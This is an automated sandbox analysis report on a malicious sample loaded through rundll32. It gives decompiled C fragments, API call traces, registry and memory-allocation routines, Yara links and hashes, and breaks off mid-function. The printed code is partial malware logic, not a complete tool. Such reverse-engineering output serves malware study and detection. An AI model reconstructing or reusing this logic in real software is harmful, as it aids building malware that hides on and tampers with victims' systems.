                                • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                                • String ID:
                                • API String ID: 486277218-0
                                • Opcode ID: 8660de9f8772830ba8f02a02f167e35e938433a9c577a04ddda442354a00bb54
                                • Instruction ID: 6783e324d385e9a13a95a90f674892b15456a116e47ea690cf9e20925c840adb
                                • Opcode Fuzzy Hash: 8660de9f8772830ba8f02a02f167e35e938433a9c577a04ddda442354a00bb54
                                • Instruction Fuzzy Hash: 1B212A7240011EBFEF11EE94DC848EE7BA9FB0A290B058426FE159F620D632DD609B95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03489661 Relevance: 6.1, APIs: 4, Instructions: 64memoryregistryCOMMON
                                Download Yara Rule
                                APIs
                                • RegQueryValueExA.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,034762DD,?,?,?,?), ref: 03489686
                                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0348969D
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,034762DD,?,?,?,?,?,?,00000000), ref: 034896B8
                                • RegQueryValueExA.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,034762DD,?,?,?,?), ref: 034896D7
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: HeapQueryValue$AllocateFree
                                • String ID:
                                • API String ID: 4267586637-0
                                • Opcode ID: d079b5be10664744a30a235ecd411a9774b1dd316eda95fec68fd70e1e8d925e
                                • Instruction ID: 0537bf4a1e5b2c38ea76525db5e1f0833707fcf1c2491fdd913c3810d53a10ec
                                • Opcode Fuzzy Hash: d079b5be10664744a30a235ecd411a9774b1dd316eda95fec68fd70e1e8d925e
                                • Instruction Fuzzy Hash: FC113AB6900518FFDB12EF95DC84CEEBBBDEB89350B104056F901AA220E3715E40DB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03434B89 Relevance: 6.0, APIs: 4, Instructions: 44sleepthreadtimeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 65%
                                			E03434B89(void* __ecx, intOrPtr _a4) {
				struct _FILETIME _v12;
				int _t13;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t30;
				signed int _t34;

				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				asm("stosd");
				do {
					_t13 = SwitchToThread();
					GetSystemTimeAsFileTime( &_v12);
					_t23 = _v12.dwHighDateTime;
					_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
					_push(0);
					_push(0x13);
					_push(_t23 >> 5);
					_push(_t16);
					L034383A6();
					_t34 = _t16 + _t13;
					_t18 = E03435D2E(_a4, _t34);
					_t30 = _t18;
					_t19 = 3;
					Sleep(_t19 << (_t34 & 0x00000007)); // executed
				} while (_t30 == 1);
				return _t30;
			}











                                0x03434b8e
                                0x03434b99
                                0x03434b9a
                                0x03434b9a
                                0x03434ba6
                                0x03434baf
                                0x03434bb2
                                0x03434bb6
                                0x03434bb8
                                0x03434bbd
                                0x03434bbe
                                0x03434bbf
                                0x03434bc9
                                0x03434bcc
                                0x03434bd3
                                0x03434bd7
                                0x03434bde
                                0x03434be4
                                0x03434bee

                                APIs
                                • SwitchToThread.KERNEL32(?,00000001,?,?,?,03431D14,?,?), ref: 03434B9A
                                • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,03431D14,?,?), ref: 03434BA6
                                • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 03434BBF
                                  • Part of subcall function 03435D2E: memcpy.NTDLL(00000000,00000000,?,?,00000000,?,?,?,00000000), ref: 03435D8D
                                • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,03431D14,?,?), ref: 03434BDE
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                                • String ID:
                                • API String ID: 1610602887-0
                                • Opcode ID: 82f6ea27b5e0097abbc7cab2de0b65eeaaaaa8816e1afc53e9737a37c3549f04
                                • Instruction ID: 012b3e19e01eb34fe48e745c66afb7b14850908fc952d221e4e93ac09a05e758
                                • Opcode Fuzzy Hash: 82f6ea27b5e0097abbc7cab2de0b65eeaaaaa8816e1afc53e9737a37c3549f04
                                • Instruction Fuzzy Hash: B1F0A477A402087BD7149BA5DC5DFDF77F9DB89351F040125F601EB340E6B49A008654
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034771B4 Relevance: 6.0, APIs: 4, Instructions: 42stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,0349A170,00000000,03485D81,?,0347F2F7,?), ref: 034771D3
                                • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,0349A170,00000000,03485D81,?,0347F2F7,?), ref: 034771DE
                                • _wcsupr.NTDLL ref: 034771EB
                                • lstrlenW.KERNEL32(00000000), ref: 034771F3
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                                • String ID:
                                • API String ID: 2533608484-0
                                • Opcode ID: f43664807143c568affeedd8b85eac533d1001a9fe22157be72ba3b5c71451df
                                • Instruction ID: 37f0bae655df3b07072776a5b43a80fef7a78f5488093e0c66a98f1f8119a5aa
                                • Opcode Fuzzy Hash: f43664807143c568affeedd8b85eac533d1001a9fe22157be72ba3b5c71451df
                                • Instruction Fuzzy Hash: 7BF0B4362012102E9312FBB65C8CABF5A9DBB926A4724082FF514EE144DF64CC0285A9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348C384 Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON
                                Download Yara Rule
                                APIs
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0348C3A3
                                  • Part of subcall function 03478FAE: RtlEnterCriticalSection.NTDLL(00000000), ref: 03478FBA
                                  • Part of subcall function 03478FAE: CloseHandle.KERNEL32(?), ref: 03478FC8
                                  • Part of subcall function 03478FAE: RtlLeaveCriticalSection.NTDLL(00000000), ref: 03478FE4
                                • CloseHandle.KERNEL32(?), ref: 0348C3B1
                                • InterlockedDecrement.KERNEL32(0349A05C), ref: 0348C3C0
                                  • Part of subcall function 0348E831: SetEvent.KERNEL32(000005BC,0348C3DB), ref: 0348E83B
                                  • Part of subcall function 0348E831: CloseHandle.KERNEL32(000005BC), ref: 0348E850
                                  • Part of subcall function 0348E831: HeapDestroy.KERNELBASE(05D70000), ref: 0348E860
                                • RtlExitUserThread.NTDLL(00000000), ref: 0348C3DC
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
                                • String ID:
                                • API String ID: 1141245775-0
                                • Opcode ID: 953425f7b50f3729034430aae37430a70925cee91b843676c0638c807a0b15de
                                • Instruction ID: 779c7508fe3bc4fd881a62119d7a385ef354c1f39a08f6d61df6075df67460f2
                                • Opcode Fuzzy Hash: 953425f7b50f3729034430aae37430a70925cee91b843676c0638c807a0b15de
                                • Instruction Fuzzy Hash: 4AF04430540204AFDB02AB698C8AE5E7B68FB43730B61035BF525AF2C4DB745D0287A8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0343765B Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 50%
                                			E0343765B(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x343a3cc; // 0x55e95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x343a3cc; // 0x55e95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x343a030) {
					HeapFree( *0x343a2d8, 0, _t8);
				}
				_t9 = E03436E6D(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x343a3cc; // 0x55e95b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                                0x0343765b
                                0x0343765b
                                0x03437664
                                0x03437674
                                0x03437674
                                0x03437679
                                0x0343767e
                                0x00000000
                                0x00000000
                                0x0343766e
                                0x0343766e
                                0x03437680
                                0x03437684
                                0x03437696
                                0x03437696
                                0x034376a1
                                0x034376a6
                                0x034376a9
                                0x034376ae
                                0x034376b2
                                0x034376b8

                                APIs
                                • RtlEnterCriticalSection.NTDLL(055E9570), ref: 03437664
                                • Sleep.KERNEL32(0000000A), ref: 0343766E
                                • HeapFree.KERNEL32(00000000,00000000), ref: 03437696
                                • RtlLeaveCriticalSection.NTDLL(055E9570), ref: 034376B2
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID:
                                • API String ID: 58946197-0
                                • Opcode ID: 47b16599131d4346353d7bf98023b1c8c7ec8147b3bc6a4680a091feb0140556
                                • Instruction ID: 043ce0e274e53489f1f2ea55613b4af37681e8530d986ecf2449dd0b5bcacbd1
                                • Opcode Fuzzy Hash: 47b16599131d4346353d7bf98023b1c8c7ec8147b3bc6a4680a091feb0140556
                                • Instruction Fuzzy Hash: 72F0FEB02842419BE710FF69DD48F567FF4AB16740B044405F9D5EF2A5C770E850CB19
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348A451 Relevance: 5.1, APIs: 4, Instructions: 110COMMON
                                Download Yara Rule
                                APIs
                                • memset.NTDLL ref: 0348A477
                                • memcpy.NTDLL ref: 0348A49F
                                  • Part of subcall function 03487950: NtAllocateVirtualMemory.NTDLL(0348EB0F,00000000,00000000,0348EB0F,00003000,00000040), ref: 03487981
                                  • Part of subcall function 03487950: RtlNtStatusToDosError.NTDLL(00000000), ref: 03487988
                                  • Part of subcall function 03487950: SetLastError.KERNEL32(00000000), ref: 0348798F
                                • GetLastError.KERNEL32(00000010,00000218,0349386D,00000100,?,00000318,00000008), ref: 0348A4B6
                                • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,0349386D,00000100), ref: 0348A599
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
                                • String ID:
                                • API String ID: 685050087-0
                                • Opcode ID: 56312a6f808637d2bcdd5fbecfc261597ef59eb1f054559f135c8301564f2b47
                                • Instruction ID: 743d7b7c7f747ec56d51f679c34e680a16da23cdf31dac63dbd0b88a784d2307
                                • Opcode Fuzzy Hash: 56312a6f808637d2bcdd5fbecfc261597ef59eb1f054559f135c8301564f2b47
                                • Instruction Fuzzy Hash: A341A0B5504701AFD761EF25D841BABBBF8BB48310F00892FF598CA250E770D5558BA6
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0343216C Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E0343216C(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E03433695(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x343a348; // 0x21ad5a8
				_t4 = _t24 + 0x343be58; // 0x55e9400
				_t5 = _t24 + 0x343be00; // 0x4f0053
				_t26 = E0343155C( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x343a348; // 0x21ad5a8
						_t11 = _t32 + 0x343be4c; // 0x55e93f4
						_t48 = _t11;
						_t12 = _t32 + 0x343be00; // 0x4f0053
						_t52 = E034328C4(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x343a348; // 0x21ad5a8
							_t13 = _t35 + 0x343ba51; // 0x30314549
							_t37 = E034341FA(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x343a2fc - 6;
								if( *0x343a2fc <= 6) {
									_t42 =  *0x343a348; // 0x21ad5a8
									_t15 = _t42 + 0x343bde2; // 0x52384549
									E034341FA(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x343a348; // 0x21ad5a8
							_t17 = _t38 + 0x343be90; // 0x55e9438
							_t18 = _t38 + 0x343be68; // 0x680043
							_t45 = E034374B6(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x343a2d8, 0, _t52);
						}
					}
					HeapFree( *0x343a2d8, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E03433AC2(_t54);
				}
				return _t45;
			}



















                                0x0343216c
                                0x0343217c
                                0x0343217f
                                0x03432186
                                0x03432188
                                0x03432188
                                0x0343218b
                                0x03432190
                                0x03432197
                                0x034321a4
                                0x034321a9
                                0x034321ad
                                0x034321bb
                                0x034321c9
                                0x034321cd
                                0x0343225e
                                0x0343225e
                                0x034321d3
                                0x034321d3
                                0x034321d8
                                0x034321d8
                                0x034321df
                                0x034321eb
                                0x034321ed
                                0x034321ef
                                0x034321f1
                                0x034321f8
                                0x03432203
                                0x0343220a
                                0x0343220c
                                0x03432213
                                0x03432215
                                0x0343221c
                                0x03432227
                                0x03432227
                                0x03432213
                                0x0343222c
                                0x03432231
                                0x03432238
                                0x03432256
                                0x03432258
                                0x03432258
                                0x034321ef
                                0x0343226a
                                0x0343226a
                                0x0343226c
                                0x03432271
                                0x03432273
                                0x03432273
                                0x0343227e

                                APIs
                                • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,055E9400,00000000,?,76CDF710,00000000,76CDF730), ref: 034321BB
                                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,055E9438,?,00000000,30314549,00000014,004F0053,055E93F4), ref: 03432258
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,034366BE), ref: 0343226A
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: 0b41953ac505877d7445532ad434a47a0065ca6bf7110315988c65cd8a4beacd
                                • Instruction ID: 65171fb13a2789fb5ff4cd6878a4f4252b1947163d869d12fbe420fa275aada1
                                • Opcode Fuzzy Hash: 0b41953ac505877d7445532ad434a47a0065ca6bf7110315988c65cd8a4beacd
                                • Instruction Fuzzy Hash: 0831DF3690020CBFDB11EBD9DC85F9A7BFCEB49B00F14015AAA04AF261D3B19A19CB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034343EB Relevance: 4.6, APIs: 3, Instructions: 82memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 85%
                                			E034343EB(intOrPtr* __eax, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				intOrPtr _t30;
				intOrPtr _t34;
				intOrPtr* _t42;
				void* _t43;
				void* _t46;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t51;

				_t42 = _a16;
				_t48 = __eax;
				_t22 =  *0x343a348; // 0x21ad5a8
				_t2 = _t22 + 0x343b67a; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
				if( *0x343a2ec >= 5) {
					_t30 = E034356C8(_a4, _t43, _t46,  &_v48,  &_v8,  &_a16);
					L5:
					_a4 = _t30;
					L6:
					if(_a4 != 0) {
						L9:
						 *0x343a2ec =  *0x343a2ec + 1;
						L10:
						return _a4;
					}
					_t50 = _a16;
					 *_t48 = _a16;
					_t49 = _v8;
					 *_t42 = E0343708D(_t50, _t49); // executed
					_t34 = E03432B23(_t49, _t50); // executed
					if(_t34 != 0) {
						 *_a8 = _t49;
						 *_a12 = _t34;
						if( *0x343a2ec < 5) {
							 *0x343a2ec =  *0x343a2ec & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E0343561E();
					HeapFree( *0x343a2d8, 0, _t49);
					goto L9;
				}
				_t51 =  *0x343a3e0; // 0x55e9b78
				if(RtlAllocateHeap( *0x343a2d8, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t30 = E0343300E(_a4, _t51,  &_v48,  &_v8,  &_a16, _t37);
				goto L5;
			}















                                0x034343f2
                                0x034343f9
                                0x034343fd
                                0x03434402
                                0x0343440d
                                0x0343441d
                                0x0343446c
                                0x03434471
                                0x03434471
                                0x03434474
                                0x03434478
                                0x034344b2
                                0x034344b2
                                0x034344b8
                                0x034344bf
                                0x034344bf
                                0x0343447a
                                0x0343447d
                                0x0343447f
                                0x0343448c
                                0x0343448e
                                0x03434495
                                0x034344cc
                                0x034344d1
                                0x034344d3
                                0x034344d5
                                0x034344d5
                                0x00000000
                                0x034344d3
                                0x03434497
                                0x0343449e
                                0x034344ac
                                0x00000000
                                0x034344ac
                                0x0343441f
                                0x0343443a
                                0x03434454
                                0x00000000
                                0x03434454
                                0x0343444d
                                0x00000000

                                APIs
                                • wsprintfA.USER32 ref: 0343440D
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 03434432
                                  • Part of subcall function 0343300E: GetTickCount.KERNEL32 ref: 03433025
                                  • Part of subcall function 0343300E: wsprintfA.USER32 ref: 03433072
                                  • Part of subcall function 0343300E: wsprintfA.USER32 ref: 0343308F
                                  • Part of subcall function 0343300E: wsprintfA.USER32 ref: 034330B1
                                  • Part of subcall function 0343300E: wsprintfA.USER32 ref: 034330D8
                                  • Part of subcall function 0343300E: wsprintfA.USER32 ref: 03433103
                                  • Part of subcall function 0343300E: HeapFree.KERNEL32(00000000,?), ref: 03433116
                                  • Part of subcall function 0343300E: wsprintfA.USER32 ref: 03433135
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 034344AC
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: wsprintf$Heap$Free$AllocateCountTick
                                • String ID:
                                • API String ID: 1307794992-0
                                • Opcode ID: 2ec694fae8c4f3bbe1e14267bf84b116140ee7a4670557a76532229ad4e45e74
                                • Instruction ID: 14050e7be6efed57449da57cd79a74450dce0605c65e1d548be71c2b91594f1f
                                • Opcode Fuzzy Hash: 2ec694fae8c4f3bbe1e14267bf84b116140ee7a4670557a76532229ad4e45e74
                                • Instruction Fuzzy Hash: FE314976540208EFCB01EFA6D884EDA3BFCFB0A304F108066E955AF350D7709955CBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03486C1E Relevance: 4.6, APIs: 3, Instructions: 81registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0348B7A4: RegCreateKeyA.ADVAPI32(80000001,0616B7F0,?), ref: 0348B7B9
                                  • Part of subcall function 0348B7A4: lstrlen.KERNEL32(0616B7F0,00000000,00000000,00000000,?,0348A2EB,00000001,?,00000000,00000000,00000000,?,0347109E,03499F2C,00000008,00000003), ref: 0348B7E2
                                • RegQueryValueExA.KERNEL32(00000000,75BCC740,00000000,00000000,03499068,0347E6ED,00000001,00000000,0616C314,0349906E,00000000,00000000,0348CB01,0616C314,75BCC740,00000000), ref: 03486C72
                                • RegSetValueExA.KERNEL32(03499068,00000003,00000000,00000003,03499068,00000028), ref: 03486CB3
                                • RegCloseKey.ADVAPI32(?), ref: 03486CBF
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Value$CloseCreateQuerylstrlen
                                • String ID:
                                • API String ID: 2552977122-0
                                • Opcode ID: de4bc3d4ad4658ed069ba8510ddb528ee9226670cedd8cb903deac5d35ad0457
                                • Instruction ID: 38b9b24ec2dc23b010c87cf5321100046efe6e19bba95ffd72723e09a159d8ec
                                • Opcode Fuzzy Hash: de4bc3d4ad4658ed069ba8510ddb528ee9226670cedd8cb903deac5d35ad0457
                                • Instruction Fuzzy Hash: 84316775D00218EFEF61EF98E8449AEBBF8EB18714F06416FEA14FA244C3354A44CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03476261 Relevance: 4.6, APIs: 3, Instructions: 73registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0349087A: lstrlen.KERNEL32(?,00000000,0348BA3E,00000027,0349A1E8,?,00000000,?,?,0348BA3E,?,00000001,?,03480971,00000000,?), ref: 034908B0
                                  • Part of subcall function 0349087A: lstrcpy.KERNEL32(00000000,00000000), ref: 034908D4
                                  • Part of subcall function 0349087A: lstrcat.KERNEL32(00000000,00000000), ref: 034908DC
                                • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020119,?,?,?,00000000), ref: 034762A8
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,00000000), ref: 034762BE
                                • RegCloseKey.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 03476307
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Open$Closelstrcatlstrcpylstrlen
                                • String ID:
                                • API String ID: 4131162436-0
                                • Opcode ID: f6161c8c33d037cfe292272c2e226dec5e5a77d7d8906df1feb8f813d071e5ef
                                • Instruction ID: 8740a218a3ead5ac891e10fda4e60b797a8f6d1c43b80a2515e791c8b9277e15
                                • Opcode Fuzzy Hash: f6161c8c33d037cfe292272c2e226dec5e5a77d7d8906df1feb8f813d071e5ef
                                • Instruction Fuzzy Hash: 5C218E75900208BFDB01EFD5DC81CEEBBBDEB04204B0540BBE500AB211E7349E58CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03433B58 Relevance: 4.6, APIs: 3, Instructions: 73memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 79%
                                			E03433B58(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				char* _t56;
				char* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;
				_v12 = 0xb;
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 =  &(_t56[_t5]);
					_t28 =  *_t46;
					_v5 = _t28;
					 *_t46 = 0;
					__imp__(_a8, _t45);
					_v16 = _t28;
					_t57 = StrStrA(_t56, _a8);
					if(_t57 != 0) {
						 *_t46 = _v5;
						_t33 = RtlAllocateHeap( *0x343a2d8, 0, _a16 + _t60); // executed
						_t48 = _t33;
						if(_t48 == 0) {
							_v12 = 8;
						} else {
							_t58 = _t57 - _a4;
							E03437A1E(_t57 - _a4, _a4, _t48);
							_t38 = E03437A1E(_a16, _a12, _t58 + _t48);
							_t53 = _v16;
							_t59 = _a16;
							E03437A1E(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t60 - _v16 + _t59;
						}
					}
				}
				return _v12;
			}
















                                0x03433b60
                                0x03433b63
                                0x03433b65
                                0x03433b6e
                                0x03433b80
                                0x03433b80
                                0x03433b84
                                0x03433b86
                                0x03433b89
                                0x03433b8c
                                0x03433b95
                                0x03433b9f
                                0x03433ba3
                                0x03433ba8
                                0x03433bb8
                                0x03433bbe
                                0x03433bc2
                                0x03433c11
                                0x03433bc4
                                0x03433bc4
                                0x03433bcd
                                0x03433bdc
                                0x03433be1
                                0x03433bee
                                0x03433bf7
                                0x03433c02
                                0x03433c09
                                0x03433c0d
                                0x03433c0d
                                0x03433bc2
                                0x03433c18
                                0x03433c1f

                                APIs
                                • lstrlen.KERNEL32(76CDF710,?,00000000,?,76CDF710), ref: 03433B8C
                                • StrStrA.SHLWAPI(00000000,?), ref: 03433B99
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 03433BB8
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: AllocateHeaplstrlen
                                • String ID:
                                • API String ID: 556738718-0
                                • Opcode ID: 846b026cf8200bc0ffb4ac8ae5fd71a487c871c7becd1583efc760d05709bbc2
                                • Instruction ID: 330da2c3c63a5cde570806a1d7adc7a52538714a7743377a5d1825fd10ba2b70
                                • Opcode Fuzzy Hash: 846b026cf8200bc0ffb4ac8ae5fd71a487c871c7becd1583efc760d05709bbc2
                                • Instruction Fuzzy Hash: EE21903A604249AFCF11DF68C884B9EBFB5EF8A214F088155EC54AF309C735D955CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03436E6D Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                                Download Yara Rule
                                C-Code - Quality: 47%
                                			E03436E6D(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
